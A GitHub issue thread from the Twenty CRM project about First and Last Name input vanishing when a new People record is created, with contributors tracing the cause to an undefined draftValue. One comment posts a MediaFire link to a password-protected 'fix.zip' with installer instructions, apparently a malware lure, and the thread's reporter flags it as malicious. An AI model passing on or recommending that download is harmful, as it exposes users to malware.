### ISSUE TITLE
When creating new People object, data from First/Last Name is lost after clicking on First/Last Name field

### ISSUE THREAD

**Issue by BOHEUS** [twentyhq/twenty#6740]
**Scenario:**
1. Log in
2. Go to People
3. Click on '+' in right top corner
4. Enter anything in First name and click on Last name field

**Actual:** Data inserted in First name field disappears after clicking on Last name field (on video it's clear that after inserting data in both name fields and clicking on any of them, it disappears)
[Screencast from 2024-08-26 12-17-50.webm](https://github.com/user-attachments/assets/c175dbad-1beb-4f7e-adf8-62c277d24d5d)

**Expected:** Data must stay in First name field

**Note:** Problem doesn't appear when entering data in First name field and clicking Tab in order to move to Last name field

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BOHEUS** [comment]
@charlesBochet delete comment above please, it contains malicious content

**Comment by harshit078** [comment]
Seems like the current state is not getting saved as when you press Enter or Tab or click outside it saves the new cell when you switch from first name or last name. However when you attempt to rename the cell then it works normally.

**Comment by Nabhag8848** [comment]
Related and has same issue as in #6633 **draftValue** is getting reset when we tab on it. I'm handling it in PR #6736 as this particular thing will need to fix first inorder to also handle that whitespace fullName field shouldn't create record.

**Comment by Nabhag8848** [comment]
Hey @harshit078 would you like to tackle this ? as I was able to test this without solving, I haven't handle it yet. 

I can help you to get your PR first contribution, right at this line just console.log(draftValue) this is getting undefined when we tap on it this can be starting point to find out whats the core issue and as always things can get complicated. 

https://github.com/twentyhq/twenty/blob/1d6a1f64c93bd96e7700e7476936ffa81db02df8/packages/twenty-front/src/modules/object-record/record-field/meta-types/input/components/FullNameFieldInput.tsx#L31

**Comment by harshit078** [comment]
Sure @Nabhag8848, Will take this up no issue.

**Comment by charlesBochet** [comment]
Thank you guys!

**Comment by Bonapara** [comment]
@harshit078 are you still willing to take this up? If yes I will assign you. Thanks for contributing!

**Comment by harshit078** [comment]
On debugging, It can be seen that  `  const draftValue = useRecoilValue(getDraftValueSelector());` is the place where draftValue is being undefined. However `recordId`, `fieldName` and `scopeId` all are defined and are being not passed as NULL. Since draftValue is undefined then through nullish operator we should get the empty string operator but firstValue is still being passed the draftValue ` firstValue={draftValue?.firstName ?? ''}` & `secondValue={draftValue?.lastName ?? ''}` . If we only pass `''` in both first and second Value, this issue resolved itself as can be seen in the attached video. What are your opinions on this ? 

https://github.com/user-attachments/assets/5c81e29f-c569-4348-b1e2-0b2a8c7284b4

**Comment by Bonapara** [comment]
@lucasbordeau will have a thought for your @harshit078. Thanks for tackling it!

**Comment by harshit078** [comment]
Also this only happens when creating a new cell for the first time. When a cell already created and then if you edit the first name or last name, then it saves the current state.

https://github.com/user-attachments/assets/42a1cfac-2410-486f-96c1-c2ac2d024481

**Comment by charlesBochet** [comment]
@lucasbordeau can you investigate this one?

draftValue should not be reset once we are still in the open cell
